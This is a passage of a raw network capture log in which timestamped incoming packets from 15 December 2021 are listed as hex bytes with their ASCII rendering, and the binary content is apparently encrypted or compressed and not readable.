92 9b f6 64 f7 45 66 dd 3e 68 de 26 cd 05 3d 5d c5 35 5f f7 b0 c9 cd b1 66 e7 a4 84 f1 59 6c d9 7f 3a 2f ae 54 d6 66 e1 73 91 64 e7 d2 40 97 62 9c a2 fa ef 54 32 53 0e 1a ce 39 Data Ascii: &Dm'`}%w)]SZb=Jg\[`VG4ay\|cEP7qWYid;XUK+\].2nS>td_TdvF}+bx+"c4pdEf>h&=]5_fYl:/Tfsd@bT2S9
2021-12-15 13:13:48 UTC	81	IN	Data Raw: e9 95 1c 04 88 77 a6 e1 36 2f 09 9a 77 3f eb 6b d6 1f 60 a4 ee e0 75 98 c0 c7 7b ee 08 d9 b8 f7 73 44 4e 76 48 91 eb e6 62 86 a8 73 69 c8 95 50 da 3d f6 17 74 ee 46 38 be fc b6 dd 10 07 c7 31 f4 09 c0 91 ee cc 69 17 c9 35 95 30 56 78 84 28 e5 b6 05 1f 30 b9 d4 23 45 7b 4e 38 75 bb dd 1d 88 45 a5 1f 88 54 73 24 de 9c 0e 48 4b bc ab 85 30 47 c8 70 f3 8e cc 30 b7 c2 dc 7b 5a f0 0f 4d 2b 75 03 3d 7f f2 ee 28 6a 1a 13 e7 00 5f 6a 1b 1c 09 8f 28 02 93 fa ed 83 e3 91 1a 10 62 24 55 cb f4 84 82 aa de 72 6d 06 19 da 96 9f ed 9b 37 f5 7c 2c 1c fa 9c f3 2e 99 7e d5 98 9c 4c 75 1b a8 1e 46 28 fc 9f ef 1d b8 e0 2f ca 54 3e de 78 2e 66 0b 07 15 31 36 87 82 91 74 de 32 37 88 5c 7e 07 fe 16 07 d6 c8 b3 02 0c 1b b5 a9 99 8c 72 7d e4 74 42 f9 5d ab 19 d8 f7 22 02 70 2f cd Data Ascii: w6/w?k`u{sDNvHbsiP=tF81i50Vx(0#E{N8uETs$HK0Gp0{ZM+u=(j_j(b$Urm7\|,.~LuF(/T>x.f16t27\~r}tB]"p/
2021-12-15 13:13:48 UTC	82	IN	Data Raw: 9b 43 3a d4 7d dd 63 1b 7b b0 b8 5e 07 50 83 0c a8 21 12 2d f7 28 72 d4 cd 64 0e b5 db df d5 97 c7 89 06 7b a5 c4 20 eb da f9 52 1c 68 e3 cf 52 ef 8c 83 41 ff 77 e2 f0 5e 52 1f f1 72 82 2b 37 90 aa 24 c9 71 ab 08 4c bf 76 38 b4 22 a1 ce cc 5d 4f 1d 3f 60 18 91 22 5b ef 2a bf 75 b8 9e 7d 8d 0a 16 84 90 a6 5b 8e 18 9a 77 bd 6e c9 b5 13 b7 43 8b b3 9e 63 10 19 ad da d4 d7 99 bd a4 f9 2c 66 f5 c9 98 79 35 18 ba 52 bf c4 ba 51 93 27 38 8f e8 ce 7a 19 3e 72 c3 59 17 7c f2 6c 3e ac 54 d8 c3 8e 8f 70 c9 04 bd 7f ba a0 b8 79 79 a0 13 ca d8 8c c6 cd f5 e8 42 85 17 d7 5c ab b3 7e 57 f7 0f 89 4b 6a 8a f8 ef 08 23 fc 4d ff 24 50 48 4e ba a8 d0 2a 64 60 ad 0d b6 08 ba b3 ea 5b 43 c4 a3 3f c2 71 d1 86 38 8b 85 a7 73 fe 99 59 51 6b b5 40 af 4a 41 e1 80 bb 23 b5 b6 8c 4c Data Ascii: C:}c{^P!-(rd{ RhRAw^Rr+7$qLv8"]O?`"[u}[wnCc,fy5RQ'8z>rY\|l>TpyyB\~WKj#M$PHNd`[C?q8sYQk@JA#L
2021-12-15 13:13:48 UTC	83	IN	Data Raw: 21 e3 83 1d db b2 d8 eb a7 35 98 e1 4f 12 3d 38 bb 4a e1 28 01 9d 0f 82 e7 f4 59 87 df 5c 3b e5 bd 60 ea bc e9 1e 95 d2 cd e8 f2 b2 4e b9 2e ea b0 be b2 47 1b 44 21 ba b9 2f 92 f7 3d 1d eb cc 33 cb 97 60 da 65 50 b9 0b e7 97 67 73 3c 90 ba 4e c9 b6 47 88 0a 81 0e 4b af b1 1e 71 65 41 5d 14 be 70 4d 28 75 05 8c a3 90 9c b5 78 af e7 cf 80 cc 72 a6 35 2e 6b ce 0d 66 b5 b6 95 0b a7 93 99 76 2c 16 c2 4b 78 54 73 b1 ad d3 4b 70 d8 9d 0d 8a 73 d4 a4 04 24 50 9f 7d 7a ee 23 12 25 7b 07 b2 66 9e 19 12 a3 81 7f 15 f4 9f 29 4a c6 75 e5 b5 bf 11 c2 4f 35 9b 8e eb d7 1a cc f2 f9 ee 7d 03 aa ff df 56 1e f2 34 5a 96 c8 ef bd da f3 2f ed 6f 72 21 58 22 de b5 2f af 97 7a 12 9f 19 40 ff 06 28 04 f5 ec 4d f0 6f 6e d5 8d c7 66 37 76 9f d8 cb f7 80 8c 1a 22 20 2b 98 40 0e 4c Data Ascii: !5O=8J(Y\;`N.GD!/=3`ePgs<NGKqeA]pM(uxr5.kfv,KxTsKps$P}z#%{f)JuO5}V4Z/or!X"/z@(Monf7v" +@L
2021-12-15 13:13:48 UTC	85	IN	Data Raw: aa 2c 21 6d 51 cf 8f f7 c6 73 40 79 c0 c0 12 1f 6d 32 78 d7 66 d2 bb 1c 73 93 4b a5 19 85 e1 c3 7f a9 73 bf 42 67 32 cc 03 2b 86 63 33 c6 a1 ab 81 62 ba b1 ed 80 e5 f0 da 9c a6 41 32 4b 0c 15 8e 5e 5c e1 9f b5 fb a1 a4 15 8d 5e 3c b7 db ed 06 64 8f 1a 38 af f6 09 ba 72 16 02 4e ac 54 b0 9b 51 bd 66 bd 41 d5 31 3d 5d 26 80 b5 c3 1a b8 89 96 00 30 e8 bf 48 a0 1c b6 b1 49 5b 3c ea aa d2 f0 ef c2 10 61 24 ac a3 4d 2b 34 81 19 45 43 f9 7d 2a 9e 87 14 df 3a 10 ed cc 3b ae 95 13 10 da 01 2b d2 a3 e4 3e c0 e7 d3 ec 8e 02 20 b0 ee 4e f6 14 82 da 7b 61 8b b2 a1 e5 ce 4b 3b 1c c5 e0 87 15 65 8b 71 cd 96 cc d6 44 93 1e 6c c3 a5 cd cd d1 d2 1b 0f ad fb ee cf f3 bf 25 8f be 30 f0 04 d7 6a 3b 9f dc 51 0d 9b c4 69 b9 d1 a0 22 fe 2b 8c 08 cc b8 dc 23 5c b2 34 65 be 45 c6 Data Ascii: ,!mQs@ym2xfsKsBg2+c3bA2K^\^<d8rNTQfA1=]&0HI[<a$M+4EC}*:;+> N{aK;eqDl%0j;Qi"+#\4eE
2021-12-15 13:13:48 UTC	86	IN	Data Raw: 64 c1 84 25 87 9b d2 8e d7 01 10 a2 ac 6d 35 80 18 1e 1f a2 1b 7b 3b e6 99 e4 33 04 72 e5 c1 12 2d 7e 5d 42 cb 21 29 d2 a5 ce df e6 f9 92 04 8b 9c 9d 34 5b 36 89 11 f4 2b e3 9e 4a 86 64 9a ff 3f af fa c5 10 84 4e 8e f5 65 05 c2 33 91 29 e0 88 3e 6a dd a9 34 59 b1 f7 22 81 ca af 38 f4 90 3b fd 1d f4 3d 4b f9 0e 57 8c ba 5a 4d 83 9f b6 13 1f f5 c6 93 75 86 1e b9 6e 28 97 9a f2 20 a7 c9 99 a3 65 94 b7 6d d4 7f 3c 7d 86 7c 7d 01 5f c2 49 55 67 ca 00 41 0f f4 82 73 de 27 b1 89 45 d9 8a 70 e4 14 a9 5b cb b0 bf 39 43 66 2b 27 3c ef 20 1b a7 52 cb c5 c5 d4 2d f0 84 00 f4 92 cb 50 4d 03 c9 7f 34 f3 19 69 ee 5d 33 81 6e 1c 09 89 8c 75 8b ab 07 54 0c 14 c6 68 59 df 86 be b8 77 55 e4 37 ed e8 79 dd 7a 5d 3e 67 5a 43 cb 9f 3f 16 77 c9 9e e9 0e d4 7a 8f ad 78 9d 5d db Data Ascii: d%m5{;3r-~]B!)4[6+Jd?Ne3)>j4Y"8;=KWZMun( em<}\|}_IUgAs'Ep[9Cf+'< R-PM4i]3nuThYwU7yz]>gZC?wzx]
2021-12-15 13:13:48 UTC	87	IN	Data Raw: 07 30 b9 16 9b df 93 6e ef 4d 14 23 80 36 6a 55 e6 8b a0 3c 37 cb 67 c8 5a b4 c2 cd d0 e5 27 e5 ab 46 55 9c df be 20 c1 52 b1 e4 a5 1a 32 50 3d 6c c3 58 95 39 1b 7e 69 6c 23 26 de a2 2a b8 b2 15 10 63 29 ba 90 f2 8e ab 10 14 bb 9f 24 a0 5b a4 d6 65 92 a3 d7 47 16 f7 28 7c e1 6b 39 0e 2a b1 6e 89 e2 83 8d f2 ee 65 8e e4 8e a1 1c 40 60 89 38 ad ef 88 f2 c2 ff ad 33 24 e0 26 83 a2 d9 ef 74 19 3c 99 02 6b d6 21 87 c8 2a 50 6e a7 86 9e 45 bd 24 51 6b 3a 6b 03 e0 66 fb 0f 03 29 20 8b 6c 96 92 5a 84 df 46 a4 8d 44 1d 3c bc 02 b0 b1 a6 f2 da fc 7f 15 e4 43 a4 bc 87 ee 69 98 c3 9c 96 47 35 7a 99 82 92 7c a6 99 a4 33 d8 08 a1 a9 18 ec e1 71 f0 56 15 09 a8 16 84 78 ca b0 6b 0b d0 d2 c3 aa 07 df 97 89 6e 99 59 cd 31 f1 8b 5d 42 2e aa f7 c6 79 e2 7a 0e 03 f5 ac 20 4b Data Ascii: 0nM#6jU<7gZ'FU R2P=lX9~il#&c)$[eG(\|k9ne@`83$&t<k!*PnE$Qk:kf) lZFD<CiG5z\|3qVxknY1]B.yz K
2021-12-15 13:13:48 UTC	88	IN	Data Raw: de 57 e5 3a 6f 34 10 6c d8 ec 3b d0 40 b1 63 96 b8 82 67 06 78 c4 bf d6 f3 97 d8 72 06 fa 47 22 b3 7c da 00 1b 56 84 98 b3 7b 0a 1b b5 a9 99 88 a4 9e c7 b1 5c 5b 61 4e df 88 77 db 52 ef 08 34 6d 88 ff 4b c8 d2 2f a6 66 b0 d9 45 bd db 0c b4 fc 8e 53 87 dc 64 70 cf 88 2f c4 f9 f5 35 c8 c7 52 b8 ed 70 7f b5 f9 a8 12 4c a4 b8 80 49 40 fd ed 63 00 89 37 38 38 a5 a5 1a b5 e4 98 10 b0 b7 e5 1e 52 44 34 c8 fa 87 64 d0 ca 36 35 51 bb ad 56 b6 1e 30 21 c4 85 a4 ea 5a dd 45 8b 8b 79 78 ce e6 5a 41 b3 45 a2 0c 7a fd 11 1f 93 dc 8f 35 59 74 2a 03 1e da fc 58 e6 a2 ee 01 a6 92 10 fc 9c ca f0 2f 56 bc 21 fc 49 00 3b 86 49 67 2c 4f 6e 85 12 f2 9e 0f 5d 92 64 91 a2 ff f9 1e 99 5d dc b0 00 74 76 33 0c cf 7d 00 2f 70 a1 b8 02 8c 25 2f dc da 79 e5 44 df 83 91 10 b7 21 20 ff Data Ascii: W:o4l;@cgxrG"\|V{\[aNwR4mK/fESdp/5RpLI@c788RD4d65QV0!ZEyxZAEz5Yt*X/V!I;Ig,On]d]tv3}/p%/yD!
2021-12-15 13:13:48 UTC	90	IN	Data Raw: 63 5a 1e 2d 6f 48 63 c2 b8 71 b2 99 95 fc 0b 11 59 93 b5 a9 fe 46 bf 15 1a 5a 91 f6 48 cf fc fc 2b 94 b2 88 b0 e2 5e 15 74 d2 b8 a1 71 20 92 0b ad f5 6a 3b df 12 d0 53 79 dd fe 8c 18 fe 10 7f ad b6 79 2c f5 ea 76 64 66 22 20 3c 5f 05 c4 a0 a3 08 5e 4c e6 ca 62 11 a9 41 85 7a 2d b8 55 ba 9d 38 d1 1e 5a c4 21 78 26 ed f0 f7 2c 21 0f bb ad 30 fc 47 53 06 c8 f3 14 b6 d0 14 18 65 4c 34 69 18 fc af 9a 47 97 61 72 18 28 17 89 40 4d a6 b3 30 3c ca c1 e4 66 72 92 02 fd d5 20 29 da ef f0 f0 81 32 3d ae 5d 32 14 8d 1a 83 33 d0 33 ff 58 fa 72 f4 04 1c f7 25 7f 05 e1 7d 2e ce ac 81 2b 06 0f 23 14 ce 90 ea d8 9f 47 74 b4 e5 c0 62 21 eb 1c 67 68 ca d9 72 ce 7c d0 25 a5 25 a7 b9 5d 8a dc ff 4c d0 72 bb 33 8a 2f 3d 48 54 9b 5e 7d bd 2f d5 f6 b6 36 a6 26 3e 37 05 7a e8 bd Data Ascii: cZ-oHcqYFZH+^tq j;Syy,vdf" <_^LbAz-U8Z!x&,!0GSeL4iGar(@M0<fr )2=]233Xr%}.+#Gtb!ghr\|%%]Lr3/=HT^}/6&>7z
2021-12-15 13:13:48 UTC	91	IN	Data Raw: 20 c5 7b 4d 02 35 07 0d 46 8b e3 73 03 e9 7c 9f fb 66 4d 26 26 e8 6e 25 7b c1 13 74 2b 19 00 f6 ee 29 fd 32 25 f5 03 db 6f c2 39 fa fa 15 e0 20 1e dc 59 67 f8 d0 c6 77 ec 3a a0 74 15 1b af a2 6c 6a 8a 9f 8b 78 90 bc 97 85 91 7e 1a d0 8e e9 fa 34 ab dc b3 d6 da f7 6c 86 6c f8 f6 74 5e 3b 73 0e 4d 7a 40 14 8b 98 b6 49 c9 09 31 8a d7 52 0d 90 c0 ec d9 e8 5b 9b 29 27 a1 e4 10 d7 60 a1 72 4f eb 7d 3d a5 7f 4d 9b 2a f9 95 6d 24 46 fb db 1f a4 76 fb 5a cf 37 87 b7 31 2a 34 d1 9d fc 9e f5 d1 7d e1 ae f1 85 e7 9e b8 ac ec 24 32 21 17 75 5a cb 2c 84 97 f9 5f 6d 61 8d 48 15 63 a1 94 be 09 48 86 23 d4 dc 04 32 b4 8c 7a 32 3c 12 c1 5e 56 a3 54 8d 51 27 30 12 f1 ac 43 25 1f 0a f7 40 ee a4 31 84 53 68 2a 36 6b 85 f9 7e 81 b6 1f d6 2e 7c 32 22 6c 2d 4a dc 4b c3 36 48 5c Data Ascii: {M5Fs\|fM&&n%{t+)2%o9 Ygw:tljx~4llt^;sMz@I1R[)'`rO}=Mm$FvZ714}$2!uZ,_maHcH#2z2<^VTQ'0C%@1Sh*6k~.\|2"l-JK6H\
2021-12-15 13:13:48 UTC	92	IN	Data Raw: 86 e1 05 cc 28 53 a2 79 d5 98 a4 1b f7 18 dd 6c 41 56 c7 6c 3b 8b 3c bc 66 d7 11 c1 aa b8 47 c9 7b 7d 3e 9a 44 fe ae d1 f9 4b be 24 ae ee 2c 51 2f 16 6d 9e 45 d6 f7 0d 1b b5 7b 0b 70 07 85 66 c5 3a c2 ea 4e 02 20 0a dd aa ca 9a 01 b4 81 74 0e 8b b1 d0 fb 34 3b e6 48 87 c3 d3 d9 19 89 53 87 0f f6 88 45 93 8e b0 9f 6c ee c8 02 e2 c5 eb 88 59 fd 9a 3c 43 c7 e1 21 9f 34 dc be 66 36 8f 1d 62 38 38 e2 11 e5 4a e4 98 08 6e 33 cf b0 3a 9c 03 08 c5 0d 19 b3 21 67 be 57 60 6d cb c9 9f db 53 c1 00 30 ad 4c de 00 d5 09 c7 6c 9e 0e d2 d3 a3 ae 06 61 7f 14 99 9e 95 22 75 91 f9 7a f7 0e 37 5d 3f 66 1e 02 9d 89 41 e6 4f fa 5f 16 6a 52 42 63 8d dc 06 8b 34 06 c0 73 2c 4a 54 99 77 ad 33 f2 a2 ee 33 c3 c9 76 b1 62 60 d7 0a 17 a3 00 6c 3f 42 4d 73 66 02 fb 83 48 83 d7 ae 6a Data Ascii: (SylAVl;<fG{}>DK$,Q/mE{pf:N t4;HSElY<C!4f6b88Jn3:!gW`mS0Lla"uz7]?fAO_jRBc4s,JTw33vb`l?BMsfHj
2021-12-15 13:13:48 UTC	93	IN	Data Raw: 38 bb 62 3a 30 f2 a5 65 46 c5 bb 5a 16 44 02 5b 98 b4 23 70 93 66 c3 e5 91 7f 5b 01 33 b0 91 64 e7 73 8d 97 c7 e7 d6 ef 04 93 1d 30 2c 4f 03 f2 88 83 46 ea 71 40 c6 ee 24 04 fb a9 f2 2a e0 d3 35 c8 f3 78 44 b8 2e cb 07 04 af eb 88 da 62 d2 0c 9b c8 da 2e ae e7 c4 c2 8f de e4 ce b7 18 43 1e b0 a1 30 b7 70 6e 4b 03 4a 26 2b f2 ae af 63 23 bc c3 38 ef fb ef 99 e4 11 ba 3c e8 36 42 d9 01 e5 fb 00 fb 46 0a 48 00 82 e5 d6 ba 12 fa af 17 fe 55 ac ef b1 b0 57 a1 b8 13 70 81 52 f5 e3 0f 49 c6 24 c4 14 d7 ba ca 3a b5 35 df c9 a7 ae 7d 60 19 82 9a 35 36 ef 82 e8 d4 a0 83 ba 85 aa 46 18 04 40 58 ab 8a 15 03 ab b2 49 e3 53 d1 9b af ef 2e 02 44 70 f8 fe 62 b9 25 4f c8 e3 c0 15 40 20 9c 52 e1 f8 38 ed 9a a0 87 ca 22 6b 0b b3 eb 25 c2 4e c0 ad e7 ab e8 fc 80 76 55 17 08 Data Ascii: 8b:0eFZD[#pf[3ds0,OFq@$*5xD.b.C0pnKJ&+c#8<6BFHUWpRI$:5}`56F@XIS.Dpb%O@ R8"k%NvU
2021-12-15 13:13:48 UTC	95	IN	Data Raw: c4 68 24 43 2b 0e 36 9c 37 40 c9 2d a7 1d 0c f8 b2 7c 00 19 8d 81 d6 b9 e8 e5 73 ba 5e cc 75 b2 e1 7e 64 5a 10 c4 d0 f8 ec db 89 77 1a cf 60 27 d0 b6 4d e7 96 7b 00 e5 e4 c9 7a 0f dc 77 26 47 80 cf 31 96 86 66 26 bb a9 13 8f 49 bf e1 b4 54 2f 28 0f 0c 74 53 e6 b0 cc 31 29 c8 ad e1 d8 18 ff 33 70 93 a4 b8 12 92 a7 e1 fe a2 f7 94 a1 87 9d 43 10 75 bf 50 3b e4 48 8f 96 9e eb c8 08 c8 d1 a5 70 9c 6b c2 a3 4d 46 fa 70 91 5e 7a dd c5 19 92 18 94 db 1f 4d 9a 9b 5a 2b f3 0c 96 88 5d 35 5e 13 b2 83 a4 18 96 75 97 26 0e a3 af ec 05 f3 2e 17 e0 bd 47 49 88 7c a1 90 c2 cb d5 1a f9 c0 b8 ae 0d 6e 02 ef b2 8f 12 8d 65 ae 47 e0 cb 60 fc 43 34 9b de fe e2 b5 5a 9c aa b0 cb 0e cf 0c 53 4a 4b 98 f6 63 60 17 b7 95 18 13 8c f6 b9 17 6e 5e 27 1c 72 a1 c7 d0 94 37 dd a8 6b 65 Data Ascii: h$C+67@-\|s^u~dZw`'M{zw&G1f&IT/(tS1)3pCuP;HpkMFp^zMZ+]5^u&.GI\|neG`C4ZSJKc`n^'r7ke
2021-12-15 13:13:48 UTC	96	IN	Data Raw: de 01 d2 f9 e6 d4 de be b0 ac bc 34 97 be 1a ab 74 d2 85 4d 87 a9 a3 c6 49 10 08 58 b3 34 2e e0 64 95 22 e7 8d 44 cb 54 3e de 7b ca 62 d7 0f 54 10 3e 87 2d 92 11 ac d5 cc 77 f0 a1 14 4d 47 8a 5b 10 ac f0 0f b5 a2 fc 66 98 ff 92 14 6f 49 54 2f 46 4f 2f 08 dd 05 70 d2 84 38 90 27 83 91 85 33 3b a1 e3 7b b6 12 d8 b6 e8 da 74 ac 2b d2 e5 68 c4 5a fc 97 eb 57 09 14 67 b9 03 14 77 5b 27 27 05 58 4a 64 74 fc fb af ff 8e a4 37 d9 66 e1 96 43 df 21 02 5c 9f 74 fa bb eb 18 3a c1 00 0b c5 a3 a1 21 84 2e be d4 f4 ec 15 b0 36 2c fe 1d 08 7e 96 a2 21 50 6f 87 46 2a 9e 5d dc 5a 4b 14 ac 9e a6 89 2a ec 42 32 dd 55 06 2a 2a 90 67 9a 04 81 a8 7c 11 65 ed 94 9b af 3e 25 84 04 12 d9 58 d6 4b 8b b7 41 08 38 cb 06 36 85 77 bd 13 f8 a2 ee 31 7d 08 00 f5 9d 12 df 5f 18 a1 00 10 Data Ascii: 4tMIX4.d"DT>{bT>-wMG[foIT/FO/p8'3;{t+hZWgw[''XJdt7fC!\t:!.6,~!PoF]ZKB2U**g\|e>%XKA86w1}_
2021-12-15 13:13:48 UTC	97	IN	Data Raw: d8 0d b5 38 91 89 e2 40 f4 11 4b 85 39 3b 04 f3 be 87 f6 06 de 21 8a c7 e5 a0 96 2a d9 0b a9 58 01 b7 e3 ab 3d a4 e8 3a 60 fe 07 f4 29 b5 b5 3f 04 c8 d8 8f f9 de f2 4d 6e 03 91 f3 b2 9b 44 6a 03 58 cf 36 64 69 42 c5 f3 76 55 4d c9 64 4a df 65 20 53 01 c5 df ee 6e 4f 34 5b e8 8d 61 00 a3 c6 80 38 fc d0 94 02 c0 ff fa cd 6c 5f 8b b2 9f b1 05 55 ba dd b1 b1 31 a5 c5 1f 8a 47 f3 d6 a5 c1 c0 75 af 09 b7 6f c4 f5 8c 2c 30 fd e5 f6 b2 d1 fa b9 d9 17 11 ba 02 85 e5 5d 2f ae 9c 92 ca 84 9b e2 72 1c f9 63 c1 97 16 18 11 28 34 0f 17 27 fa 80 19 19 3b ca 3e 4d 55 86 6f 00 41 ee c0 3c cb e0 b1 92 88 ec ad 23 70 65 69 56 a4 2a ff e1 3d 90 be 3d d8 0c 42 8f a3 67 08 5e 3a 19 f3 c5 49 bc 3f e3 82 14 16 69 0b 4b 67 3e 72 d9 df df 0d e9 50 ad ee e0 e2 e4 3f 01 14 64 ce 62 Data Ascii: 8@K9;!X=:`)?MnDjX6diBvUMdJe SnO4[a8l_U1Guo,0]/rc(4';>MUoA<#peiV==Bg^:I?iKg>rP?db
2021-12-15 13:13:48 UTC	98	IN	Data Raw: 16 8b e7 f4 60 7f 0c ae bc cc 73 b7 ed 85 a8 c2 0f 2b f1 b5 49 d4 35 c0 c9 a6 30 67 17 d3 b4 18 13 65 36 20 df 56 7b 80 d9 51 b6 27 68 68 43 ff a6 db aa 4c 4a 51 d4 2b a8 1c 9d 7f 7a ed 81 13 3b f7 4d f6 d4 4a 6d 73 db e5 f3 fd 04 ff 8e 69 7e be cc b4 4f b6 87 e0 a3 4e 00 f8 79 64 7e b3 3f 05 cb 27 70 c5 9d 97 55 eb 54 c3 98 bf a0 e0 ca d0 96 b2 e8 63 aa 57 25 f3 cb c6 bf 7c 29 5b db 01 5d 01 6d 46 4f 6e c9 36 2f 4d 32 27 06 ad 05 3e 09 a0 6d 27 4e 5f 70 aa fc 64 75 e5 1b 5a 09 9a c9 6a 61 19 6c 2c 50 bd 3e 68 30 32 2f 0b 0e cd 5d 67 ba 80 de 6f 6c c6 27 94 2a 43 8d bd 3d f3 69 17 38 e3 d6 87 e0 1d f5 3b a5 71 8e 0b 60 c3 68 6a 1f b2 5c 9c 3e 91 e6 51 6d 17 c9 0f 5d 24 76 fa de 02 e5 f2 84 ef ed 62 c2 ab 79 c1 65 3d 4a 3d ce aa 32 62 49 ac eb 1e b5 ec 87 Data Ascii: `s+I50ge6 V{Q'hhCLJQ+z;MJmsi~ONyd~?'pUTcW%\|)[]mFOn6/M2'>m'N_pduZjal,P>h02/]gol'*C=i8;q`hj\>Qm]$vbye=J=2bI
2021-12-15 13:13:48 UTC	99	IN	Data Raw: 4c b3 c8 f5 43 75 8f dc ee 29 b6 4f 2d b7 9e b2 fb 5d 47 cc 36 2a 0e 6f 34 85 04 6b cf 0e d6 5d bf c4 42 4a ad 98 26 61 a8 7e 0d 14 da a6 6f 01 03 00 6c e5 8a ff 3c b1 0a 7e 14 d4 84 17 e3 8e 9d 01 ec 4b 33 6d 7e 13 5f a8 a9 00 eb 84 33 18 e8 84 4f 00 d6 34 65 0e f2 75 a1 e9 e6 d7 a0 52 64 44 75 25 92 1e ed 1e 95 8e 22 30 47 de 24 89 39 4e ad 46 95 7a ab 9c 38 0b 5b 94 97 88 f4 c8 d1 dd a8 ed 68 1a ae 43 0b 3f 51 23 c8 6f 2b 79 92 7a b1 2d ce 3b cd 79 99 6d 0a 25 a4 ab 29 99 6f e7 00 a3 16 d3 2c 8e 44 51 a1 b4 28 8a 92 d3 3a fe e8 c1 e7 5d ca f4 9b 76 02 77 c8 ca 6b 20 14 11 2c ce 5c cd 40 31 96 aa a1 9c 9d b2 81 9c af 60 ad 6b 81 8e a6 5a 74 26 c1 b1 79 00 f6 91 08 8f 80 4b 4b c0 70 f4 e0 3a c9 ae 53 9b 5e e8 e8 94 a0 9e 51 e2 7e 7b 52 3b 2c 98 1d 85 df Data Ascii: LCu)O-]G6*o4k]BJ&a~ol<~K3m~_3O4euRdDu%"0G$9NFz8[hC?Q#o+yz-;ym%)o,DQ(:]vwk ,\@1`kZt&yKKp:S^Q~{R;,
2021-12-15 13:13:48 UTC	101	IN	Data Raw: c3 4f a8 06 e5 b4 d6 39 15 da 93 30 f6 9e 0c 08 34 6a a6 5b 14 5e f0 73 d8 71 f7 44 a5 2d 5f 63 bd 35 21 ee 48 d3 71 8c 6f 1c 09 52 38 c2 5b 07 10 00 aa 18 98 60 78 86 c6 13 32 94 50 10 1e be 63 a4 ee 0f 05 d3 68 7b 43 cb 47 92 47 dd 9c 7e 30 bd d1 79 ee bb e6 75 30 ab 1e 46 2a fe e3 68 dd b7 32 e4 ca 07 d6 6b 33 2d ce 41 c7 2d c8 c9 70 d2 28 4b 55 ee cc fc d6 3c 07 cc 52 f7 57 0b ff 08 f0 e4 a2 da ab 66 00 4a 61 b9 7d 26 27 3c e2 cf 7c 67 a9 13 5a b7 68 c1 9c 34 f9 59 62 35 f0 33 d3 17 b6 01 bb 01 22 f7 d1 6c 59 19 60 84 d7 71 3b 1f 23 bb a9 04 4f 34 9f f5 48 a8 72 fd 21 82 11 c6 4b 8d 15 57 eb b2 04 d9 26 6a d0 0b 5c d5 4a 67 0c 89 ae 18 30 d0 bf 73 f7 a4 d2 84 6d 5b bf a5 f3 a7 bb b5 4e 57 23 4c ac a0 8d a6 30 37 de 52 0e a7 65 c2 c3 2a 51 17 3a 03 35 Data Ascii: O904j[^sqD-_c5!HqoR8[`x2Pch{CGG~0yu0Fh2k3-A-p(KU<RWfJa}&'<\|gZh4Yb53"lY`q;#O4Hr!KW&j\Jg0sm[NW#L07ReQ:5
2021-12-15 13:13:48 UTC	102	IN	Data Raw: f7 90 61 2c 49 54 14 32 df 13 fc 72 9a 75 fa cf 7f 25 e8 43 ef 27 49 3a f6 b7 5c 44 ce 1f bf f7 cf d3 28 a0 92 c5 35 6f be f7 30 f0 c1 dd 20 34 89 0f 1d e3 21 0c d2 78 67 fd fe 5d d2 cd dd 70 c7 77 c0 d7 7a 12 4a 8d 88 ce d7 51 10 f5 ae 0f 2d c2 11 0e 83 44 21 e7 2c 90 14 da f7 56 aa 8b 2d fe b6 1e 8b 21 44 8a b0 69 32 47 f4 bd 51 87 aa c0 73 c1 7f 18 a0 04 2b 9f 6a b0 bb 1e db 0d dc f0 ac aa 1c ae ba 49 f8 e2 bb f8 8c d3 ce 1c 9d 54 4e 65 8d 05 6b 40 ec 75 8e 93 43 21 e3 cf 4a b3 5c 6f 00 c0 a9 27 60 a0 18 db 5a 82 cf ea 21 72 9c a2 ee 5a 3c fa b2 25 35 77 10 aa 68 18 ee 12 83 77 1b 7e 7e c3 54 7f f5 d4 6f 3d 8c 68 13 cd ee 54 c2 09 c2 e0 3e e7 e9 cb fa 63 d3 8b 69 df fe 28 6d 42 d8 77 42 c2 17 e7 01 c7 a2 72 1c a4 a3 09 be 84 13 36 65 81 a9 d4 97 db 6a Data Ascii: a,IT2ru%C'I:\D(5o0 4!xg]pwzJQ-D!,V-!Di2GQs+jITNek@uC!J\o'`Z!rZ<%5whw~~To=hT>ci(mBwBr6ej
2021-12-15 13:13:48 UTC	103	IN	Data Raw: ad c5 07 7e 7e 5e 46 30 51 cd 72 8d 67 b9 65 87 0d 92 12 c6 9b 35 ff fb 09 4f fc 84 d6 29 d9 54 61 34 12 99 d5 69 46 c8 a7 13 c0 d2 5f bf 20 40 47 4d 47 09 b0 4b 3b a4 10 2f 6e 8b ef 5e a9 c3 86 6b ff bf 75 89 ae c0 2b cc 8a 25 27 c0 d2 c0 e5 9b 18 97 c0 ca 5f f0 2b ae c4 c2 92 24 75 0c 7b 7d db e9 ab 75 95 6a 9a c8 df 32 f5 21 38 8b e6 c4 68 02 f8 8b 88 b4 bd ed f7 39 98 b2 4e c9 25 b4 6a 20 e1 a3 d7 45 94 9c a0 f4 d2 cd d7 7d 72 74 bd 70 06 b7 3d 05 12 66 1b 25 2b b7 a1 e3 0d bb f8 0e 92 29 36 8c 44 85 1a 4e 54 06 64 c4 f3 8f 8d cd ff 0a da b7 19 11 b4 15 9d 12 23 ef 35 4a 40 22 a1 4f 23 1e 7f 4d d0 69 28 0c 19 ad d6 f1 96 9e 67 da e6 e4 89 dd 28 9e 45 b0 97 f5 be f8 47 55 27 24 81 5f 4c c9 d6 d9 d6 81 d2 80 ef 08 c0 4d 57 f7 32 f2 22 b4 33 bd 2e 17 3d Data Ascii: ~~^F0Qrge5O)Ta4iF_ @GMGK;/n^ku+%'_+$u{}uj2!8h9N%j E}rtp=f%+)6DNTd#5J@"O#Mi(g(EGU'$_LMW2"3.=
2021-12-15 13:13:48 UTC	104	IN	Data Raw: db 6a 72 de 1a e5 7b ba 26 8d c8 d6 b3 ae 5b 40 7e e2 94 5d ff c9 53 8e a5 f3 37 19 5a bf 6f 5a c9 4e e4 1f a1 97 30 91 02 c6 96 5d 32 42 64 bf b1 db 9c dc 16 0a ad c8 53 e0 68 62 2f fa eb d6 8b 93 60 71 50 40 4e 32 f0 cb f6 36 ed be 93 a0 33 52 ea e5 eb cf c7 14 7a 48 aa 74 0f bc 4d 87 a1 32 da 91 d8 4d db ac b5 28 fc 87 38 56 a1 34 df 34 86 60 08 f6 80 02 94 1d a9 27 e8 9d ac f9 19 1e 65 20 fc e6 24 da cd 0f 0d d6 c8 0d 65 b7 8e 4a 7b d0 28 6f cd 99 3a ef 56 4a f2 90 d8 f7 a9 00 88 9c fa 34 1b 7a 8d 18 4d 30 e6 cb ea d2 14 2e 9a 5d 8e 3c 7c 39 8a 63 4c 42 4b 29 3d 02 